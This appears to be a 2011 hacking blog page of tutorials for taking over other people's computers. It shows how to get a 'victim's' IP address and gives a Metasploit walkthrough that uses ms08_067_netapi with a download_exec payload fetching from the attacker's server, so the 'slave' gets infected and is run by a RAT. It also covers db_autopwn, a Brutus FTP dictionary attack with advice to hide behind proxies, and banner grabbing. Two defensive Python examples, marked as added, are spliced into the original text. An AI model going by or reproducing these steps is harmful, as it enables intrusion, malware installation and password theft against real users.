Thursday, 17 November 2011

GET SOMEONE’S IP ADDRESS – 3 BEST METHODS

Obtaining an IP from MSN Messenger.

First, we look at the method most people use when they want to get someone else’s IP address.


Step 1 – Start MSN Messenger and login as yourself.

Step 2 – Hit your “Start” button and click run. Type into the white box “Command” (without the quotation marks)


Step 3 – Type in “Netstat -N” (without the quotation marks) into the black box and hit enter.

Step 4 – Start a conversation with your ‘victim’ and send them a file. Once they accept the file, hit your “Start” button and click run. Type into the white box “Command” (without the quotation marks), then type “Netstat -N” (without the quotation marks) into the black box and hit enter.

Step 5 – Look in the middle column of both your MS Dos boxes and look in the newer window for the IP address that has magically appeared in the middle column. This is your victim’s IP Address.


Obtaining an IP from an E-Mail.



Ok, let’s say the person does not use MSN Messenger (can’t blame them). We can get an IP address from most E-Mail addresses. In this example we shall use Outlook Express to view the E-Mails.

Step 1 – Load Outlook Express and left click on an E-Mail that was sent from your ‘victim’.


Step 2 – Right click this E-Mail and click the “Properties” button.

Step 3 – Now click on the tab displaying “Details” as its text and look for the button saying “Message Source”. Once found (not hard), click it.

Step 4 – Look in all the jargon for something like “X-Originating-IP: “ with a number after the colon. This number is the sender’s IP Address.

Step 5 – If you cannot find “X-Originating-IP: ” then do not worry. Look instead for “Received:” and go along this string until you come to a number in brackets. This may be an IP, but it might not be the IP address of the ‘victim’; in fact, if they sent the E-Mail from a web E-Mail service (like hotmail.com) then chances are it is not their IP address.
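
The same header reading is what an analyst does when triaging a suspicious message, so here it is as an added example (not code from the original post). It reads “X-Originating-IP” and the “Received:” chain from a message source and orders the hops origin-first, which shows why the first external address is often a webmail provider's server rather than the sender. The sample message, host names and addresses are constructed, with documentation ranges standing in for public addresses.

```python
import email
import ipaddress
import re

# Constructed message source; addresses are documentation/private ranges.
SAMPLE = """\
Received: from mx.example.net (mx.example.net [203.0.113.25])
\tby inbound.example.org with ESMTP id abc123; Thu, 17 Nov 2011 10:02:11 +0000
Received: from webmail.example.net (webmail.example.net [198.51.100.7])
\tby mx.example.net with ESMTP; Thu, 17 Nov 2011 10:02:09 +0000
Received: from [192.168.1.20] by webmail.example.net via HTTP;
\tThu, 17 Nov 2011 10:02:08 +0000
X-Originating-IP: [198.51.100.44]
From: sender@example.net
To: analyst@example.org
Subject: constructed sample

body
"""

IPV4_RE = re.compile(r"(?<![\d.])(\d{1,3}(?:\.\d{1,3}){3})(?![\d.])")
# Ranges that never identify a host on the Internet (RFC 1918, loopback, link-local).
INTERNAL = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]

def classify(text):
    """Return (ip, scope) for every valid IPv4 literal found in a header value."""
    found = []
    for raw in IPV4_RE.findall(text):
        try:
            ip = ipaddress.ip_address(raw)
        except ValueError:
            continue  # looks like an address but is not one, e.g. 999.1.1.1
        scope = "internal" if any(ip in net for net in INTERNAL) else "external"
        found.append((raw, scope))
    return found

def trace_headers(source):
    """Summarise origin information; hops are listed from origin to recipient."""
    msg = email.message_from_string(source)
    hops = [classify(value) for value in msg.get_all("Received", [])]
    hops.reverse()  # the top Received line is the newest, so reverse the list
    return {"x_originating_ip": classify(msg.get("X-Originating-IP", "")),
            "received_hops": hops}
```

Only the “Received:” lines written by mail servers you control are trustworthy; everything below them, including “X-Originating-IP”, is supplied by the sending side and can be absent or forged.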

Obtaining an IP from Physical Access.

If you have physical access to a computer then getting the IP address is simple.


Step 1 – Click the “Start” button and hit “Run”. Type in “Command” and hit enter.

Step 2 – Type in “ipconfig” OR “winipcfg” and hit enter. Now look for where it says “IP Address:”; next to this is the IP of the computer you are using…

HOW TO HACK A COMPUTER USING NMAP & METASPLOIT – INFECTING THROUGH IP ADDRESS

Requirements:


Nmap
Metasploit

First of all you need the target IP of your slave.

Then open Metasploit Console & type db_create.
[Use: This’ll create or connect you to database.]

Once you do that type Nmap.
[Use: This’ll load Nmap in Metasploit Console]
Next you need to type db_nmap -sT -sV

[This’ll scan OS, Ports, and Services running on slave’s computer.]

Wait 5 minutes for the scan to complete.
Once done, note down the OS, Ports, and Services running on slave’s computer.

Now it’s time to exploit slave’s machine.

Exploit depends on the OS, Ports, and Services running on slave’s computer.

So, you’re lucky if you get OS WIN XP or 2000 because it’s easy to exploit them.

No matter whether they’re protected by any firewall or not.

Now I’ll tell you exploiting:-

Windows 2000 (all versions SP1, SP2, SP3, SP4)
Windows XP (all versions SP1, SP2, SP3)

Type show exploits
[Use: This’ll show all the exploits in its database.]

Next you need to type use windows/smb/ms08_067_netapi
[Use: This’ll select the exploit windows/smb/ms08_067_netapi]

Now Type show targets
[Use: This’ll show all targets by exploit]

Now Type set target 0

[Use: This’ll set target to 0 specified]

Then type show payloads

[Use: This’ll bring up all the payloads]

Next type set payload windows/download_exec

[Use: This’ll set payload as windows/download_exec]

Then Type show options

[Use: This’ll show all options in the exploit & payload]

In window you’ll see many options, in which you need to
Fill only two options RHOST & URL.

Type set RHOST
[Use: This’ll set RHOST (slave’s ip) to xxx.xxx.xxx.xxx]

Next Type set URL [content suppressed]
[Use: This’ll set URL to your direct server link.]

At last you need to type exploit
[Use: This will launch your exploit & your slave will be infected.]

You can now control your slave with RAT.

So, any versions of Win 2000-XP can be exploited easily.

In case you didn’t get these two OSes, immediately after the Nmap scan

You can use the command db_autopwn –p –t –e.
In most cases you get a shell.

Good Luck!

WINAUTOPWN – VERSION 2.4 – DOWNLOAD

This is to announce release of winAUTOPWN version 2.4…


winAUTOPWN is an auto (hacking) shell gaining tool. It can also be used to test IDS, IPS and other monitoring sensors/software…

Download from here

WHAT ARE DICTIONARY ATTACKS

You must first know what an FTP server is. FTP stands for File Transfer Protocol. FTP is a simple way to exchange files over the internet. If a hacker got FTP access to my website, he could delete/upload anything he wants on my server. An FTP address looks similar to a website address except it uses the prefix ftp:// instead of http://. I set up an FTP server on my computer so I could demonstrate. You can get Brutus here.

1. First the hacker would choose a target. In this case it’s my home computer and the IP address for your home computer is 127.0.0.1 .

2. By going to ftp://127.0.0.1 I get a pop-up box asking for a username and password.


3. Next the hacker would launch a program similar to Brutus and attempt to crack the password.
4. In the target you put the IP address of the website and to the right select the appropriate option, which in this case is FTP.


5. The default port is 21 but some websites change this to make them a little more secure. If you find out that the port isn’t 21, you can find the right one by doing a port scan. We will get into this later in the book.
6. If you don’t know any of the usernames for the FTP server, then you will have to get a list of the most common usernames.

7. For a dictionary attack you will have to choose the pass mode Word List and browse and select the file containing your word list. You can get some good password lists at http://packetstormsecurity.org/Crackers/wordlists/

8. Once you hit Start the program will attempt to connect to the server and begin to try all the possible combinations from your lists.


9. If you’re lucky, eventually it’ll get the right Username:Password combination.


10. A smarter hacker would use a proxy when using a program like this. A proxy cloaks your IP address by sending your connection request through another computer before going to the target. This is a smart idea because, as you will see in the image below, Brutus leaves a huge log of your presence on the target server.


11. In place of the IP address 127.0.0.1 would be the hacker’s IP address. Footprints like these get a hacker caught and into a lot of trouble with the law.
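
The log trail described in steps 10 and 11 is what a server operator can alert on. The following added example (not part of the original post) scans FTP login records for one client producing many failures in a short window across several usernames, and notes whether a successful login followed. The log lines are constructed and modelled on vsftpd's login log format, which is an assumption since the post does not name the FTP server; the threshold and window are illustrative values.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} [ \d]\d \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]*)\] (?P<result>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"')
TS_FORMAT = "%a %b %d %H:%M:%S %Y"

def constructed_sample():
    """Constructed log: 12 rapid failures from one client, then a success."""
    base = datetime(2011, 11, 17, 10, 0, 0)
    users = ["admin", "root", "ftp", "test"]
    lines = []
    for i in range(12):
        ts = (base + timedelta(seconds=2 * i)).strftime(TS_FORMAT)
        lines.append(f'{ts} [pid {2100 + i}] [{users[i % 4]}] FAIL LOGIN: Client "127.0.0.1"')
    lines.append('Thu Nov 17 10:00:30 2011 [pid 2120] [admin] OK LOGIN: Client "127.0.0.1"')
    # An ordinary user who mistyped a password once must not raise an alert.
    lines.append('Thu Nov 17 10:05:00 2011 [pid 2130] [alice] FAIL LOGIN: Client "192.168.1.50"')
    lines.append('Thu Nov 17 10:05:09 2011 [pid 2131] [alice] OK LOGIN: Client "192.168.1.50"')
    return lines

def detect_guessing(lines, threshold=10, window=timedelta(minutes=1)):
    """Return {client_ip: details} for clients with >= threshold failures in window."""
    fails = defaultdict(list)  # ip -> [(timestamp, user)] still inside the window
    alerts = {}
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # unrelated log line
        ts = datetime.strptime(m["ts"], TS_FORMAT)
        ip = m["ip"]
        recent = [(t, u) for t, u in fails[ip] if ts - t <= window]
        if m["result"] == "FAIL":
            recent.append((ts, m["user"]))
            if len(recent) >= threshold:
                a = alerts.setdefault(
                    ip, {"failures": 0, "users": set(), "success_after": None})
                a["failures"] = max(a["failures"], len(recent))
                a["users"] |= {u for _, u in recent}
        elif ip in alerts and alerts[ip]["success_after"] is None:
            # A login that succeeds right after a burst of failures needs review.
            alerts[ip]["success_after"] = m["user"]
        fails[ip] = recent
    return alerts
```

A non-empty `success_after` is the entry to look at first: it means the guessing may have found a valid password, so the account's credentials should be reset.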

BANNER GRABBING

Now that the hacker has a full list of services running on the target system, to be able to exploit them he first has to figure out what software and version each service is. One way the hacker can get this information is to telnet into the service port. In the example below, we will use the command prompt on Windows (Start -> Run -> Type “cmd” -> Enter). If you are on a Mac, you will be using the terminal. Note: If you are using Windows Vista, then telnet is not installed by default. You can install it by doing the following simple steps.

o Click Start then select Control Panel.
o Select Programs and Features.
o Select Turn Windows features on or off.
o Select the Telnet Client option and click OK.
o A box will appear to confirm installation. The telnet command should now be installed.


1. First, the hacker would choose one of the open ports that were revealed in the Nmap scan to continue with and attempt to exploit. Let’s say that when the hacker scanned his target, he found the port 21 open. As you can see on the chart above, port 21 is FTP. To find out what FTP software is running he would use telnet by running the command:
telnet www.targetsite.com 21



I ran this against my computer (localhost). So a hacker would insert a target URL in place of localhost.

2. Next, it would connect to the target and display a banner telling the hacker the software and its version as shown below. This is the information the hacker needs to continue and begin searching for vulnerabilities for the software discovered.


If the above method doesn’t work for you, then simply use Nmap’s full version detection option to get the information.